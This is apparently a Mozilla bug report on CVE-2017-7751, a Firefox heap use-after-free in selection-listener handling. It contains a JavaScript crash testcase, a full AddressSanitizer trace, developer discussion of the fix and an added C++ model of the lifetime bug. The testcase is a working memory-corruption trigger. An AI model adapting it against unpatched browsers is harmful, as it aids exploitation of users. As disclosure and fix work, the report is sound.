Bug 1363396 (CVE-2017-7751)

heap-use-after-free in nsDocViewerSelectionListener::NotifySelectionChanged

VERIFIED FIXED in Firefox -esr52

Status


defect
VERIFIED FIXED
2 years ago
2 years ago

People

(Reporter: nils, Assigned: smaug)

Tracking

({csectype-uaf, sec-high})

Trunk
mozilla55
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr45 wontfix, firefox-esr52 54+ verified, firefox53 wontfix, firefox54+ verified, firefox55+ verified)

Details

(Whiteboard: [post-critsmash-triage][adv-main54+][adv-esr52.2+])

Attachments

(3 attachments)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170509120348)

<script>
function start() {
	o8=document.documentElement.querySelector('*:not([id])');
	o18=document.createElement('iframe');
	o8.remove();
	o29=document.createElement('iframe');
	o296=document.createElementNS('http://www.w3.org/2000/svg','feMergeNode');
	window.top.document.documentElement.appendChild(o296);
	o18.setAttribute('src','javascript:undefined;');
	// Inserting o18 starts its frame loader; the javascript: load creates the
	// about:blank nsDocumentViewer seen in the allocation stack below.
	o296.replaceWith(o18);
	o610=o18.contentWindow;
	o611=o610.document;
	o612=o611.documentElement;
	o612.innerHTML="<textarea></textarea><section contenteditable>";
	window.top.document.documentElement.appendChild(o29);
	window.setTimeout(fun0, 4);
}
function fun0() {
	// Selection of the iframe's document; the script keeps it alive across
	// the viewer teardown triggered from fun1.
	o971=o610.getSelection();
	o29.contentWindow.onresize=fun1;
	o29.width=1;
	// Moving the caret notifies the selection listeners, including the one
	// still pointing at the freed nsDocumentViewer (the READ in the ASAN report).
	o971.modify('move', 'right','lineboundary');
	location.reload();
}
function fun1() {
	// Re-appending o18 moves the iframe, destroys its docshell and releases
	// the nsDocumentViewer (the free stack in the ASAN report).
	document.documentElement.appendChild(o18);
}
</script>
<body onload="start()"></body>


ASAN output:
=================================================================
==12670==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000077db0 at pc 0x7f538d68e6a3 bp 0x7ffca030da10 sp 0x7ffca030da08
READ of size 8 at 0x612000077db0 thread T0 (Web Content)
    #0 0x7f538d68e6a2 in operator bool /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:758:45
    #1 0x7f538d68e6a2 in GetDocumentSelection /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2637
    #2 0x7f538d68e6a2 in nsDocViewerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:3741
    #3 0x7f538d9a2a54 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6489:28
    #4 0x7f538d99f6b4 in nsFrameSelection::NotifySelectionListeners(mozilla::SelectionType) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2441:23
    #5 0x7f538d997208 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1891:10
    #6 0x7f538d99261b in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1166:14
    #7 0x7f538d9bfa68 in mozilla::dom::Selection::Modify(nsAString const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6665:24
    #8 0x7f538a44f7a9 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Selection*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:886:9
    #9 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #10 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #12 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #13 0x7f5391575cce in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:166:12
    #14 0x7f539152bef9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #15 0x7f5391556443 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:479:21
    #16 0x7f5391558e17 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:739:12
    #17 0x7f5390944aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #18 0x7f5390944aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #19 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #20 0x7f539092d2ff in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #21 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #22 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #23 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #24 0x7f53912d718b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #25 0x7f538acf5c25 in mozilla::dom::Function::Call(JSContext*, JS::Handle<JS::Value>, nsTArray<JS::Value> const&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #26 0x7f53894cc242 in Call<nsCOMPtr<nsISupports> > /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
    #27 0x7f53894cc242 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13106
    #28 0x7f5389677ddb in mozilla::dom::TimeoutManager::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/TimeoutManager.cpp:720:42
    #29 0x7f5389673444 in mozilla::dom::(anonymous namespace)::TimerCallback(nsITimer*, void*) /home/worker/workspace/build/src/dom/base/Timeout.cpp:65:49
    #30 0x7f5386ef8887 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:499:7
    #31 0x7f5386ec66db in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:284:11
    #32 0x7f5386ed9a42 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:200:22
    #33 0x7f5386ed934f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/worker/workspace/build/src/xpcom/threads/ThrottledEventQueue.cpp:74:15
    #34 0x7f5386ebd2d1 in mozilla::SchedulerGroup::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:259:32
    #35 0x7f5386eeac50 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
    #36 0x7f5386ee7698 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
    #37 0x7f5387c79cd1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #38 0x7f5387bdd1d0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #39 0x7f5387bdd1d0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #40 0x7f5387bdd1d0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #41 0x7f538ce81d0f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #42 0x7f539048ba17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #43 0x7f5387bdd1d0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #44 0x7f5387bdd1d0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #45 0x7f5387bdd1d0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #46 0x7f539048b545 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:709:34
    #47 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #48 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #49 0x7f53a260082f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #50 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)

0x612000077db0 is located 112 bytes inside of 296-byte region [0x612000077d40,0x612000077e68)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f538d670105 in nsDocumentViewer::Release() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:559:1
    #2 0x7f538f961a45 in assign_assuming_AddRef /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:334:7
    #3 0x7f538f961a45 in operator= /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:600
    #4 0x7f538f961a45 in nsDocShell::Destroy() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5872
    #5 0x7f538f9ad32f in non-virtual thunk to nsDocShell::Destroy() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:5796:13
    #6 0x7f5389826da4 in nsFrameLoader::DestroyDocShell() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2144:15
    #7 0x7f5389826b05 in nsFrameLoaderDestroyRunnable::Run() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:2082:19
    #8 0x7f538977e5fd in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7279:22
    #9 0x7f538977dda6 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5111:3
    #10 0x7f538b94113c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
    #11 0x7f538987354e in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:18
    #12 0x7f538987354e in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2244
    #13 0x7f5389ee8d59 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
    #14 0x7f5389ee8d59 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1829
    #15 0x7f5389ee8d59 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:856
    #16 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #17 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #18 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #19 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #20 0x7f539092d2ff in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #21 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #22 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #23 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #24 0x7f5391575cce in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:166:12
    #25 0x7f539152bef9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #26 0x7f5391556443 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:479:21
    #27 0x7f5391558e17 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:739:12
    #28 0x7f5390944aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #29 0x7f5390944aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #30 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #31 0x7f53912d718b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #32 0x7f538abaf665 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #33 0x7f538b54455b in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #34 0x7f538b54455b in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #35 0x7f538b510059 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1147:51
    #36 0x7f538b511e23 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1321:20
    #37 0x7f538b4f25c1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:464:16
    #38 0x7f538b4f59a2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9

previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f538d66f253 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f538d66f253 in NS_NewContentViewer() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:478
    #4 0x7f538df829e2 in nsContentDLF::CreateInstanceForDocument(nsISupports*, nsIDocument*, char const*, nsIContentViewer**) /home/worker/workspace/build/src/layout/build/nsContentDLF.cpp:255:46
    #5 0x7f538f9c8230 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8160:19
    #6 0x7f538f96888f in nsDocShell::EnsureContentViewer() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8022:17
    #7 0x7f538f99ccb7 in GetDocument /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4572:3
    #8 0x7f538f99ccb7 in non-virtual thunk to nsDocShell::GetDocument() /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4570
    #9 0x7f53894e3caa in nsPIDOMWindow<mozIDOMWindowProxy>::MaybeCreateDoc() /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:4117:48
    #10 0x7f538b97432d in GetDoc /home/worker/workspace/build/src/dom/base/nsPIDOMWindow.h:213:7
    #11 0x7f538b97432d in EnsureInnerWindow /home/worker/workspace/build/src/dom/base/nsPIDOMWindow.h:954
    #12 0x7f538b97432d in nsJSChannel::AsyncOpen(nsIStreamListener*, nsISupports*) /home/worker/workspace/build/src/dom/jsurl/nsJSProtocolHandler.cpp:581
    #13 0x7f538b976599 in nsJSChannel::AsyncOpen2(nsIStreamListener*) /home/worker/workspace/build/src/dom/jsurl/nsJSProtocolHandler.cpp:679:10
    #14 0x7f53887a5f38 in nsURILoader::OpenURI(nsIChannel*, unsigned int, nsIInterfaceRequestor*) /home/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:857:19
    #15 0x7f538f9786fd in nsDocShell::DoChannelLoad(nsIChannel*, nsIURILoader*, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11551:20
    #16 0x7f538f9d98be in nsDocShell::DoURILoad(nsIURI*, nsIURI*, bool, nsIURI*, bool, unsigned int, nsIPrincipal*, nsIPrincipal*, char const*, nsAString const&, nsIInputStream*, nsIInputStream*, bool, nsIDocShell**, nsIRequest**, bool, bool, bool, nsAString const&, nsIURI*, unsigned int) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:11365:8
    #17 0x7f538f9754af in nsDocShell::InternalLoad(nsIURI*, nsIURI*, bool, nsIURI*, unsigned int, nsIPrincipal*, nsIPrincipal*, unsigned int, nsAString const&, char const*, nsAString const&, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsAString const&, nsIDocShell*, nsIURI*, bool, nsIDocShell**, nsIRequest**) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:10804:8
    #18 0x7f538f96c2bb in nsDocShell::LoadURI(nsIURI*, nsIDocShellLoadInfo*, unsigned int, bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:1571:10
    #19 0x7f538981112a in nsFrameLoader::ReallyStartLoadingInternal() /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:875:19
    #20 0x7f538977e440 in ReallyStartLoading /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:759:17
    #21 0x7f538977e440 in nsDocument::MaybeInitializeFinalizeFrameLoaders() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7271
    #22 0x7f538977dda6 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5111:3
    #23 0x7f538b94113c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
    #24 0x7f5389874d2b in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:18
    #25 0x7f5389874d2b in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2521
    #26 0x7f5389870f12 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
    #27 0x7f5389870f12 in nsINode::ReplaceWith(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1831
    #28 0x7f538ac77224 in mozilla::dom::ElementBinding::replaceWith(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3538:9
    #29 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #30 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #31 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #32 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #33 0x7f539092d2ff in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #34 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #35 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #36 0x7f5390945102 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #37 0x7f53912d718b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #38 0x7f538abaf665 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:758:45 in operator bool
Shadow bytes around the buggy address:
  0x0c2480006f60: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
  0x0c2480006f70: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2480006f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2480006f90: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c2480006fa0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c2480006fb0: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c2480006fc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c2480006fd0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2480006fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2480006ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
  0x0c2480007000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12670==ABORTING
(Reporter)

Comment 1

2 years ago
Posted file ASAN output
Although the testcase uses contenteditable the stack looks more like a layout problem than an editor issue; let's start there.
Group: core-security → layout-core-security
Component: Editor → Layout
(Assignee)

Updated

2 years ago
Assignee: nobody → bugs
(Assignee)

Comment 4

2 years ago
I couldn't reproduce the crash using the testcase, but based on
code inspection this should be pretty clear.
And nsDocViewerFocusListener has a similar issue.

This is ancient code, and rather ugly, but I tried to keep the changes as minimal as possible so that patching older branches is easy. The patch seems to apply to beta cleanly.
I explicitly decided to not fix any coding style issues.
Attachment #8865979 - Flags: review?(continuation)
Attachment #8865979 - Flags: review?(continuation) → review+
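The lifetime pattern Comment 4 describes, modelled in C++ as an added illustration. This is not Gecko's code and not the attached patch: Viewer, Selection, SelectionListener, Disconnect and RunScenario are invented names. The listener keeps a raw back-pointer to the viewer while the selection owns the listener, so when the viewer is released the listener outlives it; the fix variant has the viewer clear that pointer on teardown and the listener ignore notifications once it is null, which is the "just clearing a pointer value" of the comment.

```cpp
#include <memory>
#include <vector>

// Added illustration, not Gecko's code: the listener/viewer lifetime pattern
// from this bug. Viewer, Selection, SelectionListener, Disconnect and
// RunScenario are invented names for the model.

class Viewer;

// Like nsDocViewerSelectionListener: a raw, non-owning back-pointer to the
// viewer, while the Selection holds a strong reference to the listener.
class SelectionListener {
 public:
  explicit SelectionListener(Viewer* viewer) : mViewer(viewer) {}
  // The fix: the viewer clears this pointer when it is torn down.
  void Disconnect() { mViewer = nullptr; }
  bool IsConnected() const { return mViewer != nullptr; }
  // Returns true if a live viewer was notified.
  bool NotifySelectionChanged();

 private:
  Viewer* mViewer;  // dangles after the viewer dies unless Disconnect() ran
};

// Stands in for mozilla::dom::Selection, which the testcase keeps alive
// (o971) across the iframe's docshell teardown.
class Selection {
 public:
  void AddListener(std::shared_ptr<SelectionListener> l) {
    mListeners.push_back(std::move(l));
  }
  // Returns how many listeners reached a live viewer.
  int NotifyListeners() {
    int reached = 0;
    for (auto& l : mListeners) {
      if (l->NotifySelectionChanged()) ++reached;
    }
    return reached;
  }

 private:
  std::vector<std::shared_ptr<SelectionListener>> mListeners;
};

// Stands in for nsDocumentViewer.
class Viewer {
 public:
  Viewer(Selection& selection, bool disconnectOnDestroy)
      : mDisconnectOnDestroy(disconnectOnDestroy),
        mListener(std::make_shared<SelectionListener>(this)) {
    selection.AddListener(mListener);
  }
  ~Viewer() {
    // Unfixed code only drops its own reference; the Selection still owns
    // the listener and the listener still holds this (freed) address.
    if (mDisconnectOnDestroy) mListener->Disconnect();
  }
  std::shared_ptr<SelectionListener> Listener() const { return mListener; }
  void OnSelectionChanged() { ++mChanges; }

 private:
  bool mDisconnectOnDestroy;
  int mChanges = 0;
  std::shared_ptr<SelectionListener> mListener;
};

bool SelectionListener::NotifySelectionChanged() {
  if (!mViewer) return false;     // viewer already gone: ignore
  mViewer->OnSelectionChanged();  // the read ASan flagged when mViewer dangles
  return true;
}

struct ScenarioResult {
  int reachedWhileAlive;       // notifications delivered before teardown
  bool connectedAfterDestroy;  // listener still points at a viewer afterwards
  int reachedAfterDestroy;     // -1 when not exercised (would be the real UAF)
};

ScenarioResult RunScenario(bool withFix) {
  ScenarioResult r{};
  Selection selection;  // outlives the viewer, like o971 in the testcase
  auto viewer = std::make_unique<Viewer>(selection, withFix);
  auto listener = viewer->Listener();

  r.reachedWhileAlive = selection.NotifyListeners();

  // Equivalent of nsDocShell::Destroy() releasing the content viewer.
  viewer.reset();

  r.connectedAfterDestroy = listener->IsConnected();
  // Only notify in the fixed variant: without the fix this call is the
  // heap-use-after-free from the report, so the model only inspects the pointer.
  r.reachedAfterDestroy = withFix ? selection.NotifyListeners() : -1;
  return r;
}
```

The unfixed variant deliberately stops at inspecting the stale pointer rather than dereferencing it; in the real code that dereference is the `operator bool` on the viewer's nsCOMPtr in GetDocumentSelection that ASan reported. The same shape applies to the focus listener mentioned in Comment 4.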
(Assignee)

Comment 5

2 years ago
Comment on attachment 8865979 [details] [diff] [review]
contentviewer_listeners.diff

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
I'd say not very easily.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
The patch does pinpoint where the issue is.
